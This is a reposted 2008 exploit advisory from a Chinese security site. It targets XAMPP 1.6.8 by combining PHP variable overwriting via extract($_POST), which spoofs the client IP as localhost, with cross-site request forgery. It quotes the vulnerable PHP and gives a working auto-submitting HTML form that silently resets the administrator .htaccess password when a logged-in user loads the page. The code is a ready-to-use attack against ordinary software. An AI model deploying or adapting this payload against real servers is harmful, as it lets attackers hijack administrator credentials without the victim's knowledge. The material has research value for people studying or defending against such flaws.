首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
XAMPP 1.6.8 (XSRF) Change Administrative Password Exploit
来源:www.vfcocus.net 作者:Brooks 发布时间:2008-12-09  
XAMPP change administrative password:
--------------------------------------------------------------------------------
Written by Michael Brooks
special thanks to str0ke

Affects XAMPP 1.6.8.
homepage: http://www.apachefriends.org/
XAMPP has 17+ million downloads from sourceforge.net.
register_globals=On or Off
This attack is exploitable even when this page is reporting a fully
secure system: http://10.1.1.10/security/index.php

There are two vulnerabilities that are being used toagther.
1)Global variable manipulation to spoof ip address.
2)XSRF to change the .htaccess password for http://10.1.1.10/security/
and http://10.1.1.10/xampp/ .

The $_SERVER[REMOTE_ADDR] comes directly from Apache's tcp socket and
this cannot normally be spoofed.
However extract($_POST); can be used to overwrite any declared
variable,  including the $_SERVER superglobal.  This can be used to
"spoof"  your ip address as 127.0.0.1
This xsrf attack can be exploited from a browser in any ip address, so
long as that browser is currently authenticated.

This vulnerable code is from the very top of: /security/xamppsecurity.php
<?php
       error_reporting(0);
       extract($_POST);
       extract($_SERVER);
       $host = "127.0.0.1";
       $timeout = "1";

       if ($REMOTE_ADDR) {
               if ($REMOTE_ADDR != $host) {
                       echo "<h2> FORBIDDEN FOR CLIENT $REMOTE_ADDR <h2>";
                       exit;
               }
       }
//...

//Start of xsrf attack
<html>
<form action='http://10.1.1.10/security/xamppsecurity.php' method='POST' id=1>
          <input type="hidden" name="_SERVER[REMOTE_ADDR]" value="127.0.0.1">
<input type=hidden name="xamppuser" value=admin >
<input type=hidden name="xampppasswd" value=password>
<input type=hidden name="xamppaccess" value="Make+safe+the+XAMPP+directory">
<input type=submit>
</form>
</html>
<script>
document.getElementById(1).submit();
</script>
//End of xsrf attack

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Simple Directory Listing 2 Cro
·phpBB 3 (Mod Tag Board <= 4) R
·phpMyAdmin 3.1.0 (XSRF) SQL In
·Neostrada Livebox Router Remot
·SIU Guarani Multiple Remote Vu
·DD-WRT v24-sp1 (XSRF) Cross Si
·MG2 0.5.1 (filename) Remote Co
·w3blabor CMS 3.0.5 Arbitrary F
·linux x86 shellcode obfuscator
·PayPal eStore Admin Password C
·Vinagre < 2.24.2 show_error()
·Bonza Cart <= 1.10 Admin Passw
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved